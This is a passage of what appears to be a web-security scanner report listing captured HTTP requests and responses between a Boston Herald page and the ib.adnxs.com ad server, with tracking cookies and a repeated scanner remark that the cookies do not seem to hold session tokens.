GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-61892947_1296253385%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D54892%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.6713631898164749%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb322141=5_[r^208WMZzhw!0nf8M'VILZ?enc=AAAAAAAA4D_NzMzMzMzcPwAAAKCZmQFAzczMzMzM3D8AAAAAAADgP8QzzGlufgMIBWHfHSmrEELSQENNAAAAACQ9AwA3AQAAbAEAAAIAAACDbAIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AUBAgUCAAIAAAAAUCD5SgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+8044%2C+1296253138%29%3Buf%28%27c%27%2C+43438%2C+1296253138%29%3Buf%28%27g%27%2C+18638%2C+1296253138%29%3Buf%28%27r%27%2C+158851%2C+1296253138%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3B&cnd=!wRdxQwiu0wIQg9kJGAAg_70BKNQJMQAAAAAAAOA_QhMIABAAGAAgASj-__________8BQgsIpEIQABgAIAMoAUILCKRCEAAYACACKAFIAVAAWKoDYABo7AI.; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb322141=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb502322=5_[r^208WMuF4Lw)IE.8#`^VR?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP6BgySx3_8JEBWHfHSmrEELJQUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEnQMBAgUCAAIAAAAAZSKqQQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253385%29%3Buf%28%27r%27%2C+151403%2C+1296253385%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2811%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2887%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28619%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28620%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28621%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 22:23:05 GMT Content-Length: 833
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-15295914_1296252644%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D156514%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.4698551066685468%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb64287=5_[r^208WMrO@Pn)IE.8.%R'i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxBYVBc7kOUMBWHfHSmrEELjPUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBQkBAgUCAAIAAAAAByCzmwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252387%29%3Buf%28%27r%27%2C+151403%2C+1296252387%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2811%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2887%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28619%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28620%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28621%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb64287=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb152162=5_[r^208WMM2x@N!@@-#bq9B8?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP9B6FowdZ9lbBWHfHSmrEEKBcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQELQkBAgUCAAIAAAAAMCIpMgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265345%29%3Buf%28%27r%27%2C+116344%2C+1296265345%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:42:25 GMT Content-Length: 741
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-79489099_1296252890%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D917199%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.6830512962769717%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb810948=5_[r^208WMuF4Lw)IE.8.Cw7k?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPzre96IF0ShCBWHfHSmrEELkPkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEYAYBAgUCAAIAAAAAwyH-GwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252644%29%3Buf%28%27r%27%2C+151403%2C+1296252644%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2811%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2887%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28619%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28620%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28621%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb810948=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb458625=5_[r^208WMuF4Lw)IE.8*M4Bc?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8BW6sqWS4UpBWHfHSmrEELbP0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgQBAgUCAAIAAAAAUyJEQAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252891%29%3Buf%28%27r%27%2C+151403%2C+1296252891%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2811%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2887%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28619%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28620%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28621%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 22:14:51 GMT Content-Length: 742
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-46060337_1296254384%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D966058%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.8368365135975182%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb437727=5_[r^208WMuF4Lw)IE.8pxVr8?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-1RhKNLepg-BWHfHSmrEEKtRENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEpggBAgUCAAIAAAAA6SF9GAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254125%29%3Buf%28%27r%27%2C+151403%2C+1296254125%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2811%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2887%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28619%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28620%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28621%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb437727=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: 